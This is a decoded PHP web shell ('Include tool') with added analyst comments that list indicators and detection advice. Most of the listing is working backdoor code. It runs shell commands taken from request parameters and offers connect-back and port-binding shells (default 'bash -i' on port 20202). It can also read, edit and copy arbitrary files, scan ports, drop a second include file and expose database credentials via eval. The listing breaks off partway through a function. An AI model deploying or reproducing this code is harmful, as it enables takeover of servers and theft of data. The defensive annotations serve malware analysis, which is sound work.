
PHP Decode

<?php ###################################################################### # we decide..

Decoded Output download

<?php 
###################################################################### 
# we decide if we want syslogging 
# Analyst note: closelog() closes the process's syslog connection before
# anything else runs; the syslog calls further down are commented out.
closelog(); 
###################################################################### 
# define variables 
###################################################################### 
 
# error_reporting(E_ALL); 
# All PHP error reporting is switched off for this request, so failures in
# the features below raise no warnings or notices.
error_reporting(0); 
 
# get globals even if register_globals is off 
# import_globals() (defined near the end of this listing) copies request
# parameters into global variables. From here on every bare variable such as
# $cmdcall, $chdir or $editfile is request-controlled input.
import_globals(); 
 
$safe_mode = ini_get('safe_mode'); 
$register_globals = ini_get('register_globals'); 
$magic_quotes_gpc = ini_get('magic_quotes_gpc'); 
$txt['en']['on']="on"; 
$txt['en']['off']="off"; 
$txt['de']['on']="an"; 
$txt['de']['off']="aus"; 
$lang="en"; 
 
if($safe_mode == 1) $SM = $txt[$lang]['on']; 
else {  
	$SM = $txt[$lang]['off']; 
	# set_time_limit(9000); 
} 
if($register_globals == 1) $RG = $txt[$lang]['on']; 
else $RG = $txt[$lang]['off']; 
if($magic_quotes_gpc == 1) $MQ = $txt[$lang]['on']; 
else $MQ = $txt[$lang]['off']; 
 
# navigatable functions 
# Feature switches of the tool. Each key is also the name of a request
# parameter: the matching section further down runs when it equals 1.
# For log review, requests that carry names such as cmdln, connectback,
# phpshell, dropinc, snoop or mysqlaccess set to 1 match this listing.
$ArrFuncs = array( 
	"dropinc"	=> 0, 
	"filecopy"	=> 0, 
	"fileedit"	=> 0, 
	"showsource"	=> 0, 
	"snoop"		=> 0, 
	"cmdln"		=> 0, 
	"connectback"	=> 0, 
	"phpshell"	=> 0, 
	"servicecheck"	=> 0, 
	"mysqlaccess"	=> 0, 
	"mail"		=> 0, 
	"env"		=> 0, 
	"phpenv"	=> 0, 
	"phpinfo"	=> 0, 
	"dumpvars"	=> 0, 
	"debugscript"	=> 0, 
	"syslog"	=> 0 
); 
 
# init navigation 
# Variable-variables: a switch receives its default 0 only when no global of
# that name exists yet, so a value imported from the request takes precedence.
foreach($ArrFuncs as $key => $val) if(!isset($$key)) $$key = $val; 
 
 
 
# set default values 
# Default form values for every feature. As with the switches above, a default
# is applied only when the request did not already supply the variable.
# Values in this table that are usable as indicators for this sample:
#   - TCP port 20202 for both the connect-back and the PHP shell feature
#   - the file name miniinc.php in the script's working directory
#   - /tmp as build directory together with gcc as compiler
#   - cbhost defaults to the address the request came from (REMOTE_ADDR)
$ArrDefaults = array( 
	"filecopy_source" => "http://...", 
	"filecopy_dest" => getcwd(), 
	"cmdcall" => "", 
	"editfile" => getcwd(), 
	"editcontent" => "", 
	"chdir" => ".", 
	"vsource" => $SCRIPT_FILENAME, 
	"mail_from" => "[email protected]", 
	"mail_to" => "", 
	"mail_subject" => "",  
	"mail_attach_source"  => "http://....", 
	"mail_attach_appear"  => "filename...", 
	"mail_content_type"   => "image/png", 
	"mail_msg" => "", 
	"tcpports" => "21 22 23 25 80 110", 
	"timeout" => 5, 
	"miniinc_loc" => getcwd() . "/miniinc.php", 
	"incdbhost" => "localhost", 
	"cbhost" => $_SERVER['REMOTE_ADDR'], 
	"cbport" => 20202, 
	"cbtempdir" => "/tmp", 
	"cbcompiler" => "gcc", 
	"phpshellapp" => "export TERM=xterm; bash -i", 
	"phpshellhost" => "0.0.0.0", 
	"phpshellport" => "20202" 
); 
 
# init defaults 
foreach($ArrDefaults as $key => $val) if(!isset($$key)) $$key = $val; 
 
# define executable functions 
$Mstr = array( 
	0 => "No execute functions available!", 
	1 => "passthru()", 
	2 => "system()", 
	3 => "backticks", 
	4 => "proc_open()", 
	5 => "exec()" 
); 
 
# clean request to avoid uri monster 
$SREQ = ""; 
$reqdat = array(); 
$tmpCount=0; 
foreach($REQUESTS as $key => $val){ 
	if($tmpCount==0) $reqdat[] = $key."=".$val; 
	else if($val!=0 || $val!="" || $val!="0") $reqdat[] = $key."=".$val; 
	$tmpCount++; 
} 
$SREQ = implode("&", $reqdat); 
$tmpCount=0; 
if($SREQ=="") { 
	$tmp_req = array(); 
	$tmp_qry = explode("&", $QUERY_STRING); 
	foreach($tmp_qry as $key => $val) { 
		$tmp_val = explode("=", $val); 
		if($tmpCount==0) $tmp_req[] = $tmp_val[0]."=".$tmp_val[1]; 
		else if($tmp_val[1]!=0 || $tmp_val[1]!="" || $tmp_val[1]!="0") $tmp_req[] = $tmp_val[0]."=".$tmp_val[1]; 
		$tmpCount++; 
	} 
	$SREQ = implode("&", $tmp_req); 
} 
 
if(isset($path['docroot'])) $SREQ .= "&path[docroot]=" . $path['docroot']; 
 
# set some defaults to avaoid errors 
$is_file   = array(); 
$is_dir    = array(); 
$is_w_dir  = array(); 
$is_w_file = array(); 
$emeth=0; 
if($chdir!="/" && strlen($chdir) < 2) $chdir = getcwd() . "/"; 
$chdir = str_replace("//", "/", $chdir); 
if(substr($chdir, -1) != "/") $chdir .= "/"; 
## 
# Setup wether to use PHP_SELF or SCRIPT_NAME 
if($PHP_SELF!=$SCRIPT_NAME) $MyLoc = $PHP_SELF; 
else $MyLoc = $SCRIPT_NAME; 
 
# $MyLoc = "http://" . $_SERVER['HTTP_HOST'] . $MyLoc; 
$MyLoc = "http://" . $SERVER_NAME . ":" . $SERVER_PORT . $MyLoc; 
 
# This is a list of internal inc.inc vars that do not get displayed  
# inside the dumpvars function (poss for a debug func later?) 
$DebugArr = array( 
	'ARHGFDGFGASDFG', 
	'safe_mode', 
	'register_globals', 
	'magic_quotes_gpc', 
	'txt', 
	'lang', 
	'SM', 
	'RG', 
	'MQ', 
	'ArrFuncs', 
	'val', 
	'key', 
	'env', 
	'phpenv', 
	'phpinfo', 
	'debugscript', 
	'filecopy', 
	'fileedit', 
	'showsource', 
	'snoop', 
	'mail', 
	'cmdln', 
	'syslog', 
	'servicecheck', 
	'dropinc', 
	'mysqlaccess', 
	'ArrDefaults', 
	'filecopy_source', 
	'filecopy_dest', 
	'cmdcall', 
	'editfile', 
	'editcontent', 
	'chdir', 
	'vsource', 
	'mail_from', 
	'mail_to', 
	'mail_subject', 
	'mail_attach_source', 
	'mail_attach_appear', 
	'mail_content_type', 
	'mail_msg', 
	'tcpports', 
	'timeout', 
	'miniinc_loc', 
	'incdbhost', 
	'Mstr', 
	'SREQ', 
	'reqdat', 
	'tmpCount', 
	'is_file', 
	'is_dir', 
	'is_w_dir', 
	'is_w_file', 
	'emeth', 
	'MyLoc', 
	'dumpvarsare', 
	'DebugArr', 
	'cbtempdir', 
	'cbcompiler', 
	'cbhost', 
	'cbport', 
	'phpshelltype', 
	'phpshellapp', 
	'phpshellhost', 
	'phpshellport' 
); 
 
 
# activate syslog entry 
if($syslog == 1) 
{ 
#	openlog("# XSS $SCRIPT_URI #", LOG_PID | LOG_PERROR, LOG_LOCAL0); 
#	drop_syslog_warning("Q: $QUERY_STRING :: R: $REMOTE_ADDR ($HTTP_USER_AGENT)"); 
} 
############################################################################### 
# 
# start include output  
# 
############################################################################### 
$strOutput = ""; 
$strOutput .= "<html><body bgcolor='#ffffff'> 
<table border=3 bgcolor=#aaaaaa width='100%'><tr><td><font color='#000000'> 
<center> 
<h2>Include tool</h2> 
PHP Version: " . phpversion() . " |  
safe_mode: $SM | 
register_globals: $RG |  
magic_quotes_gpc: $MQ |  
syslogging: "; 
if($syslog == 1) $strOutput .= $txt[$lang]['off']; else $strOutput .= $txt[$lang]['on']; 
$strOutput .= " 
<br><br> 
</center> 
<font color='#000000'>"; 
foreach($ArrFuncs as $key => $val) $strOutput .= make_switch($key);  
 
############################################################################### 
# test cmd shell environment 
############################################################################### 
# "env" feature: probes which command-execution primitive works and, when one
# does, runs `uname -a` and `id` through it and puts the results in the page.
# Host-side trace: the PHP / web-server process spawning pwd, uname and id in
# quick succession.
if($env == 1) {  
	$strOutput .= " 
	<table border=1><tr><td colspan=2><h3>cmd infos</h3></td></tr> 
	<tr><td>test using pwd</td><td>"; $emeth =& test_cmd_shell(); $strOutput .= "</td></tr>"; 
	if($emeth==0) {  
		$strOutput .= "<tr><td colspan=2>$Mstr[$emeth]</td></tr>"; 
	} else { 
		$strOutput .= "<tr><td>exec method</td><td>$Mstr[$emeth]</td><tr> 
		<tr><td>uname -a</td><td>" . Mexec("uname -a", $emeth) . "</td><tr> 
		<tr><td>id</td><td>" . Mexec("id", $emeth) . "</td><tr> 
		</table>"; 
	} 
} 
 
############################################################################### 
# test php environment 
############################################################################### 
if($phpenv == 1) {  
	$strOutput .= "<table border=1><tr><td colspan=2><h3>php short infos</h3></td></tr> 
		<tr><td colspan=2>posix infos</td><tr>"; 
		if(function_exists('posix_uname')) { 
			$posix_uname = posix_uname(); 
			while (list($info, $value) = each ($posix_uname)) { 
				$strOutput .= "<tr><td>$info</td><td>$value</td></tr>"; 
			} 
		} else { 
			$strOutput .= "posix_uname not available"; 
		} 
		$strOutput .= "<tr><td>current script user</td><td>" . get_current_user() . "</td><tr>"; 
		if(function_exists('posix_getuid')) $strOutput .= "<tr><td>getuid</td><td>" . posix_getuid() . "</td><tr>"; 
		else $strOutput .= "posix_getuid not available"; 
		if(function_exists('posix_geteuid')) $strOutput .= "<tr><td>geteuid</td><td>" . posix_geteuid() . "</td><tr>"; 
		else $strOutput .= "posix_geteuid not available"; 
		if(function_exists('posix_getgid')) $strOutput .= "<tr><td>getgid</td><td>" . posix_getgid() . "</td><tr>"; 
		else $strOutput .= "posix_getgid not available"; 
	$strOutput .= "</table>"; 
} 
 
 
############################################################################### 
# dump variables 
############################################################################### 
if($dumpvars == 1) { 
	$strOutput .= "<table border=1><tr><td><h3>dump variables</h3></td></tr> 
	<tr><td>" . dd("GLOBALS") . "</td></tr> 
	</table>"; 
} 
############################################################################### 
# dump variables (DEBUG SCRIPT) NEEDS MODIFINY FOR B64 STATUS!! 
############################################################################### 
if($debugscript == 1) { ?> 
	<table border=1><tr><td><h3>debug script</h3></td></tr> 
	<tr><td> 
	<? ddb("DebugArr"); ?> 
	</td></tr> 
	</table> 
<? } 
############################################################################### 
# copy file 
############################################################################### 
# "filecopy" feature: renders the form and, in the same pass, calls
# copy_file() with the request-supplied source and destination. The call is
# made on every page load with filecopy=1, not only after the form is posted.
# The request values are written into the HTML without any escaping.
if($filecopy == 1) {  
	$strOutput .= "<table border=1><tr><td colspan=2><h3>copy file</h3></td></tr> 
	<form method='post' target='_parent' action=" . $MyLoc . "?" . $SREQ . "&'> 
	<tr><td>source</td><td><input type=text name='filecopy_source' value='" . $filecopy_source . "'></td></tr> 
	<tr><td>destination</td><td><input type=text name='filecopy_dest'  value='" . $filecopy_dest . "'></td></tr> 
	<tr><td></td><td><input type=submit></td></tr> 
	<tr><td colspan=2>" . copy_file($filecopy_source,$filecopy_dest) . "</td></tr> 
	</form> 
	</table>"; 
}  
############################################################################### 
# edit file 
############################################################################### 
if($fileedit == 1) { 
	$strOutput .= "<table border=1><tr><td colspan=2><h3>edit file</h3></td></tr> 
	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'> 
	<tr><td>file</td><td><input type=text name='editfile' value='" . $editfile . "'></td></tr> 
	<tr><td>edit</td><td><input type='checkbox' name='edit' value='1'></td></tr> 
	<tr><td>content</td><td><textarea name='editcontent' cols='50' rows='10'>";  
	if($edit==1 | $editfile!=$ArrDefaults['editfile']) 
		$strOutput .= show_file($editfile); 
	$strOutput .= "</textarea></td></tr> 
	<tr><td></td><td><input type=submit></td></tr> 
	<tr><td colspan=2>"; 
	if($edit==1 | $editfile!=$ArrDefaults['editfile']) 
		$strOutput .= edit_file($editcontent,$editfile,$edit); 
 	$strOutput .= "</td></tr> 
	</table> 
	</form>"; 
} 
############################################################################### 
# execute cmd shell NEEDS MODIFINY FOR B64 STATUS!! 
############################################################################### 
# "cmdln" feature: the request parameter cmdcall is handed unchanged to
# Mexec(), i.e. to a shell running as the PHP process's user.
# test_cmd_shell() runs first to pick the execution method.
# For methods 1 and 2 the command output is printed directly into the
# response instead of being collected into $strOutput.
# Hardening that stops this section: disable_functions covering exec,
# passthru, system, shell_exec and proc_open.
if($cmdln == 1) { 
	$emeth = test_cmd_shell(); 
	$strOutput .= "<table border=1><tr><td colspan=2><h3>execute cmd execution: " . $cmdcall . "</h3></td></tr> 
	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'> 
	<tr><td>cmd line</td><td><input type=text name='cmdcall' value='" . $cmdcall . "'></td></tr> 
	<tr><td></td><td><input type=submit></td></tr> 
	<tr><td>test method with 'pwd'</td><td>" . $Mstr[$emeth] . "</td></tr> 
	<tr><td colspan=2>"; 
	if($emeth < 3) { 
		$strOutput .= "The output of this command will be somewhere on the page!"; 
		Mexec($cmdcall, $emeth); 
	} else { 
		$strOutput .= Mexec($cmdcall, $emeth); 
	} 
	$strOutput .= "</td></tr> 
	</form> 
	</table>"; 
} 
############################################################################### 
# sending mime mail 
############################################################################### 
if($mail == 1) { 
	$strOutput .= "<table border=1><tr><td colspan=2><h3>sending mime mail with attachment</h3></td></tr> 
	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'> 
	<tr><td>from</td><td><input type=text name='mail_from' value='" . $mail_from . "'></td></tr> 
	<tr><td>to</td><td><input type=text name='mail_to' value='" . $mail_to . "'></td></tr> 
	<tr><td>subject</td><td><input type=text name='mail_subject' value='" . $mail_subject . "'></td></tr> 
	<tr><td>message</td><td><textarea name='mail_msg' cols='50' rows='10'>" . $mail_msg . "</textarea></td></tr> 
	<tr><td>attach file</td><td><input type=text name='mail_attach_source' value='" .$mail_attach_source . "'></td></tr> 
	<tr><td>attach content type</td><td><input type=text name='mail_content_type' value='" . $mail_content_type . "'></td></tr> 
	<tr><td>file to appear</td><td><input type=text name='mail_attach_appear' value='" . $mail_attach_appear . "'></td></tr> 
	<tr><td></td><td><input type=submit></td></tr> 
	<tr><td colspan=2>" . drop_mime_mail($mail_from,$mail_to,$mail_subject,$mail_attach_source,$mail_content_type,$mail_attach_appear,$mail_msg) . "</td></tr> 
	</form> 
	</table>"; 
} 
 
############################################################################### 
# drop mini inc handling 
############################################################################### 
# "dropinc" feature: when the minisave checkbox is submitted, dropminiinc()
# is called with a target path (request parameter loc, defaulting to
# miniinc.php in the working directory). dropminiinc() is not defined in the
# visible part of this listing; the section title suggests it writes a second,
# smaller include file - confirm against the rest of the sample.
# Incident response: search the web root for miniinc.php and for PHP files
# created around the time of the first request to this script.
if($dropinc == 1) {  
	if($loc!="") $miniinc_loc = $loc; 
	$strOutput .= "<table border=1><tr><td colspan=2><h3>drop mini inc hole</h3></td></tr> 
	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'> 
	<tr><td>source</td><td><input type=text name='loc' value='" . $miniinc_loc . "'></td></tr> 
	<tr><td>drop</td><td><input type='checkbox' name='minisave' value='1'></td></tr> 
	<tr><td></td><td><input type=submit></td></tr> 
	<tr><td colspan=2><pre>"; 
	if($minisave==1) $strOutput .= dropminiinc($miniinc_loc); 
	$strOutput .= "</pre></td></tr> 
	</form> 
	</table>"; 
}  
############################################################################### 
# connect C back shell handling 
############################################################################### 
# "connectback" feature: with run=1 and all four fields non-empty,
# connect_back() is called with a temp directory, a compiler name, a host and
# a TCP port. connect_back() is not defined in the visible part of this
# listing; the field names indicate that a program is compiled on the host.
# Defensive measures that apply to the visible inputs: no compiler on web
# hosts, /tmp mounted noexec, and egress filtering for the web-server account
# (the default port in this sample is 20202).
if($connectback == 1) { 
	$strOutput .= "<table border=1><tr><td colspan=2><h3>connect back shell</h3></td></tr> 
	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'> 
	<tr><td>temp dir.</td><td><input type=text name='cbtempdir' value='" . $cbtempdir . "'></td></tr> 
	<tr><td>compiler</td><td><input type=text name='cbcompiler' value='" . $cbcompiler . "'></td></tr> 
	<tr><td>host</td><td><input type=text name='cbhost' value='" . $cbhost . "'></td></tr> 
	<tr><td>tcp port</td><td><input type=text name='cbport' value='" . $cbport . "'></td></tr> 
	<tr><td>execute</td><td><input type='checkbox' name='run' value='1'></td></tr> 
	<tr><td></td><td><input type=submit></td></tr> 
	<tr><td colspan=2>"; 
	if($run == 1 && $cbtempdir && $cbcompiler && $cbhost && $cbport) $strOutput .= connect_back($cbtempdir, $cbcompiler, $cbhost, $cbport); 
	$strOutput .= "</td></tr></form></table>"; 
} 
 
############################################################################### 
# PHP shell handling 
############################################################################### 
# "phpshell" feature: with run=1, DB_Shell() is called with a type ('cb'
# connect back or 'pb' port binding), a shell command line, a port and a host.
# DB_Shell() is not defined in the visible part of this listing.
# Detection: a listening socket or an outbound connection owned by the PHP /
# web-server process on a non-HTTP port (20202 by default here), and that
# process having an interactive bash child.
if($phpshell == 1) { 
	$strOutput .= "<table border=1><tr><td colspan=2><h3>PHP shell</h3></td></tr> 
	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'> 
	<tr><td>type</td><td><select name='phpshelltype'><option value='cb'>Connect Back</option><option value='pb'>Port Binding</option></select></td></tr> 
	<tr><td>shell app</td><td><input type=text name='phpshellapp' value='" . $phpshellapp . "'></td></tr> 
	<tr><td>host</td><td><input type=text name='phpshellhost' value='" . $phpshellhost . "'></td></tr> 
	<tr><td>tcp port</td><td><input type=text name='phpshellport' value='" . $phpshellport . "'></td></tr> 
	<tr><td>execute</td><td><input type='checkbox' name='run' value='1'></td></tr> 
	<tr><td></td><td><input type=submit></td></tr> 
	<tr><td colspan=2>"; 
	if($run == 1 && $phpshellapp && $phpshellhost && $phpshellport) $strOutput .= DB_Shell($phpshelltype, $phpshellapp, $phpshellport, $phpshellhost); 
	$strOutput .= "</td></tr></form></table>"; 
} 
 
 
############################################################################### 
# snooping 
############################################################################### 
if($snoop == 1) { 
	$strOutput .= "<table border=1><tr><td colspan=2><h3>file system snooping: " . $chdir . "</h3></td></tr> 
	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'> 
	<tr><td>path</td><td><input type=text name='chdir' value='" . $chdir . "'></td></tr> 
	<tr><td colspan=2>" . snoopy($chdir) . "</td></tr> 
	</form> 
	</table>"; 
} 
############################################################################### 
# show highlited source 
############################################################################### 
# "showsource" feature: highlight_file() renders whatever path the request
# parameter vsource names, so any file readable by the PHP process can be
# disclosed (application config files included). The section also runs when
# showsource is off but vsource differs from its default; the condition uses
# the bitwise | operator on the two comparison results.
# open_basedir limits which paths highlight_file() can reach.
if(($showsource == 1) | ($vsource!=$ArrDefaults['vsource'])) { 
	$strOutput .= "<table border=1><tr><td colspan=2><h3>show source: " . $vsource . "</h3></td></tr> 
	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'> 
	<tr><td>path</td><td><input type=text name='vsource' value='" . $vsource . "'></td></tr> 
	<tr><td></td><td><input type=submit></td></tr> 
	<tr><td colspan=2>" . highlight_file($vsource, 1) . "</td></tr> 
	</form> 
	</table>"; 
} 
############################################################################### 
# service check 
############################################################################### 
# "servicecheck" feature: a TCP connect scan run from the web server.
# servhost and tcpports are space-separated lists taken from the request;
# for every host/port pair fsockopen() is attempted with the given timeout and
# one line is read from the socket as a banner.
# Because the connections originate from the server, this reaches hosts and
# ports that are only visible from inside its network segment. Detection:
# the web-server account opening many short-lived outbound TCP connections to
# a sequence of ports; mitigation: egress filtering for that account.
if($servicecheck == 1) { 
if($servhost!="") $host = $servhost; 
else $host = "localhost"; 
 
	$strOutput .= "<table border=1><tr><td colspan=2><h3>simple service check</h3></td></tr> 
	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'> 
	<tr><td>host(s)</td><td><input type=text name='servhost' value='" . $host . "'></td></tr> 
	<tr><td>tcp port(s)</td><td><input type=text name='tcpports' value='" . $tcpports . "'></td></tr> 
	<tr><td>timeout</td><td><input type=text name='timeout' value='" . $timeout . "'></td></tr> 
	<!-- tr><td>udp port(s)</td><td><input type=text name='udpports' value='<?=$sports?>'></td></tr --> 
	<tr><td></td><td><input type=submit></td></tr> 
	<tr><td colspan=2><pre>"; 
 
	$hosts = explode(" ", $host); 
	$port = explode(" ",$tcpports); 
	$values = count($port); 
	$numhosts = count($hosts); 
	if($values == 1 && $port[0] != "") $strOutput .= "
Checking 1 port..
"; 
	else if($values > 1) $strOutput .= "Checking $values ports..
"; 
	else $strOutput .= "No ports specified!!
"; 
	if($numhosts > 1) $strOutput .= "On $numhosts hosts..
"; 
	else if($numhosts == 1) $strOutput .= "On 1 host..
"; 
	else $strOutput .= "No hosts specified!!
"; 
	if($numhosts >= 1) { 
		for($hcount=0; $hcount < $numhosts; $hcount++) { 
			$tmphost = $hosts[$hcount]; 
			$strOutput .= "
Testing $tmphost..
"; 
			if(($values == 1 && $port[0] != "") | $values > 1) { 
				for ($cont=0; $cont < $values; $cont++) { 
					# Errors from the connect and the read are suppressed with @.
					@$sock[$cont] = fsockopen($tmphost, $port[$cont], $oi, $oi2, $timeout); 
					$service = getservbyport($port[$cont],"tcp"); 
					@$get = fgets($sock[$cont]); 
					if(isset($get)) $strOutput .= "Port: $port[$cont] ($service) - Banner: $get 
"; 
					flush(); 
				} 
			} 
		} 
	} 
	$strOutput .= "</pre></td></tr> 
	</form> 
	</table>"; 
} 
############################################################################### 
# show phpinfo 
############################################################################### 
if($phpinfo == 1){  
	phpinfo(); 
} 
###################################################################### 
# db stuff 
###################################################################### 
if($mysqlaccess == 1) { 
	$strOutput .= "<table border=1> 
	<form method='post' target='_parent' action='$MyLoc?$SREQ&'> 
	<tr><td>db host</td><td><input type='text' name='incdbhost' size='10' value='$incdbhost'/></td></tr> 
	<tr><td>user</td><td><input type='text' name='incdbuser' size='10' value='$incdbuser'/></td></tr> 
	<tr><td>pass</td><td><input type='text' name='incdbpass' size='10' value='$incdbpass'/></td></tr> 
	<tr><td>name</td><td><input type='text' name='incdbname' size='10' value='$incdbname'/></td></tr> 
	<tr><td>table</td><td><input type='text' name='incdbtable' size='10' value='$incdbtable'/></td></td></tr> 
	<tr><td>sql query</td><td><input type='text' name='incdbsql' size='50' value='$incdbsql'/></td></td></tr> 
	<tr><td>dumpfile</td><td><input type='text' name='incdbfile' size='10' value='$incdbfile'/></td></td></tr> 
	<!-- tr><td>Variables?</td><td><input type='checkbox' name='incdbvar'<? if($incdbvar!='') echo ' checked '; /></td></tr --> 
	<tr><td colspan=2><input type='submit' name='submit' value='Query'/></td></tr> 
	</table>"; 
} 
 
if($incdbhost!="" && $incdbuser!="") { 
	if($incdbvar!="") $dbh = $incdbhost; 
	else $dbH = $incdbhost; 
	$dbu = $incdbuser; 
	$dbp = $incdbpass; 
	if($incdbsql!="") $dbs = $incdbsql; 
	if($incdbname!="") $dbn = $incdbname; 
	if($incdbtable!="") $dbt = $incdbtable; 
	if($incdbfile!="") $dumpfile = $incdbfile; 
} 
 
# MySQL access, indirect form: $dbh, $dbu, $dbp and $dbn hold the NAMES of
# global variables rather than the values themselves. Each eval() below builds
# the source text  $Gdbxxx = "$<name>";  and runs it, which reads the global
# whose name came from the request - presumably the including application's
# own database settings.
# Two consequences for the defender:
#   - request text is spliced into evaluated PHP source;
#   - the resolved host, user and password are written into the page, so
#     after a hit on this script any database credential held in a PHP global
#     should be treated as disclosed and rotated.
# display_dbs(), display_tables(), display_rows(), display_query(),
# dump_query() and dump_rows() are not defined in the visible part of this
# listing.
if(isset($dbh)) { 
	$strOutput .= "<table border=1><tr><td><b>mysql access</b></td></tr>"; 
	eval("\$Gdbhost = \"\$$dbh\";"); 
	eval("\$Gdbuser = \"\$$dbu\";"); 
	eval("\$Gdbpass = \"\$$dbp\";"); 
	eval("\$Gdbname = \"\$$dbn\";"); 
	$strOutput .= "<tr><td>"; 
	if($dbn=="") { 
		$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass . 
		"</td></tr><tr><td>" . 
		display_dbs($Gdbhost, $Gdbuser, $Gdbpass); 
	} else if(isset($dbs)) { 
		# A request-supplied SQL statement is run as-is; with $dumpfile set
		# the result goes through dump_query() instead of display_query().
		$Gdbsql = $dbs; 
		$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass." name=".$Gdbname."<br/>sql=".$Gdbsql .  
		"</td></tr><tr><td>"; 
		if(isset($dumpfile)) { 
			$strOutput .= dump_query($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname, $Gdbsql, $dumpfile); 
		} else { 
			$strOutput .= display_query($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname, $Gdbsql); 
		} 
	} else if(isset($dbt)) { 
		$Gdbtabl = $dbt; 
		$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass." name=".$Gdbname." table=".$Gdbtabl; 
		if($dumpfile!="") $strOutput .= " dumpfile=" .$dumpfile; 
		$strOutput .= "</td></tr><tr><td>"; 
		if(isset($dumpfile)) { 
			$strOutput .= dump_rows($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname, $Gdbtabl, $dumpfile);		 
		} else { 
			$strOutput .= display_rows($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname, $Gdbtabl); 
		} 
	} else { 
		$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass." name=".$Gdbname . 
		"</td></tr><tr><td>" . 
		display_tables($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname); 
	} 
	$strOutput .= "</pre></td></tr></table><br/>"; 
} 
 
if(isset($dbH)) { 
	$strOutput .= "<table border=1><tr><td><b>mysql access</b></td></tr><tr><td>"; 
	if($dbn=="") { 
		$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp. 
		"</td></tr><tr><td>". 
		display_dbs($dbH, $dbu, $dbp); 
	} else if(isset($dbs)) { 
		$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp." name=".$dbn."<br/>sql=".$dbs. 
		"</td></tr><tr><td>"; 
		if(isset($dumpfile)) { 
			$strOutput .= dump_query($dbH, $dbu, $dbp, $dbn, $dbs, $dumpfile); 
		} else { 
			$strOutput .= display_query($dbH, $dbu, $dbp, $dbn, $dbs); 
		} 
	} else if(isset($dbt)) { 
		$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp." name=".$dbn." table=".$dbt; 
		if($dumpfile!="") $strOutput .= " dumpfile=" .$dumpfile; 
		$strOutput .= "</td></tr><tr><td> "; 
		if(isset($dumpfile)) { 
			$strOutput .= dump_rows($dbH, $dbu, $dbp, $dbn, $dbt, $dumpfile);		 
		} else { 
			$strOutput .= display_rows($dbH, $dbu, $dbp, $dbn, $dbt); 
		} 
	} else { 
		$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp." name=".$dbn . 
		"</td></tr><tr><td>" . 
		display_tables($dbH, $dbu, $dbp, $dbn); 
	} 
	$strOutput .= "</pre></td></tr></table><br/>"; 
} 
 
if(isset($Odbh)) { 
	$strOutput .= "<table border=1><tr><td><b>odbc access</b></td></tr>"; 
	eval("\$Gdbhost = \"\$$Odbh\";"); 
	eval("\$Gdbuser = \"\$$dbu\";"); 
	eval("\$Gdbpass = \"\$$dbp\";"); 
	eval("\$Gdbname = \"\$$dbn\";"); 
	$strOutput .= "<tr><td>"; 
	if(isset($dbt)) { 
		$Gdbtabl = $dbt; 
		$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass." name=".$Gdbname." table=".$Gdbtabl . 
		"</td></tr><tr><td>" . 
		display_rows($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname, $Gdbtabl); 
	} else { 
		$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass . 
		"</td></tr><tr><td> " . 
		Odisplay_tables($Gdbhost, $Gdbuser, $Gdbpass); 
	} 
	$strOutput .= "</pre></td></tr></table><br/>"; 
} 
 
if(isset($OdbH)) { 
	$strOutput .= "<table border=1><tr><td><b>odbc access</b></td></tr><tr><td>"; 
	if(isset($dbt)) { 
		$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp." name=".$dbn." table=".$dbt . 
		"</td></tr><tr><td> " . 
		Odisplay_rows($OdbH, $dbu, $dbp, $dbn, $dbt); 
	} else { 
		$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp . 
		"</td></tr><tr><td> " . 
		Odisplay_tables($OdbH, $dbu, $dbp); 
	} 
	$strOutput .= "</pre></td></tr></table><br/>"; 
} 
 
 
# Delivery of the assembled page: the HTML collected in $strOutput is
# base64-encoded and emitted as the data: URI of a full-size, absolutely
# positioned iframe. Ten closing </div> tags are printed first, presumably to
# break out of the layout of the page that included this script.
# Response-side signature: the run of ten </div> followed by an <iframe> whose
# src starts with data:text/html;base64, . Plain-text matching on the tool's
# own strings (for example its page title) will not hit the response body,
# because everything inside the iframe is base64.
$strOutput .= "</font></td></tr></table>"; 
$strOutputB64 = chunk_split(base64_encode($strOutput)); 
echo "</div></div></div></div></div></div></div></div></div></div>
"; 
echo '<iframe width="100%" height="100%" style="border:0; position: absolute; left: 0px; top: 0px;" src="data:text/html;base64,' . $strOutputB64 .'">'; 
 
###################################################################### 
# 
# functions 
# 
###################################################################### 
# make globals avail 
# Re-creates the old register_globals behaviour by hand and fills the server
# globals the rest of the script reads.
#   - When register_globals is reported as empty, 'Off' or 0,
#     import_request_variables('GPC') turns GET, POST and cookie parameters
#     into global variables. That function was removed in PHP 5.4, so this
#     listing targets PHP 4 / early PHP 5 hosts.
#   - $REQUESTS receives the request parameters ($_REQUEST, or the merged
#     GET and POST arrays on very old versions).
#   - The server values come from $HTTP_SERVER_VARS when $_SERVER['PHP_SELF']
#     is empty, otherwise from $_SERVER.
# Takes no arguments and returns nothing; it only writes globals.
function import_globals()   
{ 
	global $HTTP_SERVER_VARS; 
	global $REMOTE_ADDR;   
	global $PHP_SELF; 
	global $REQUESTS; 
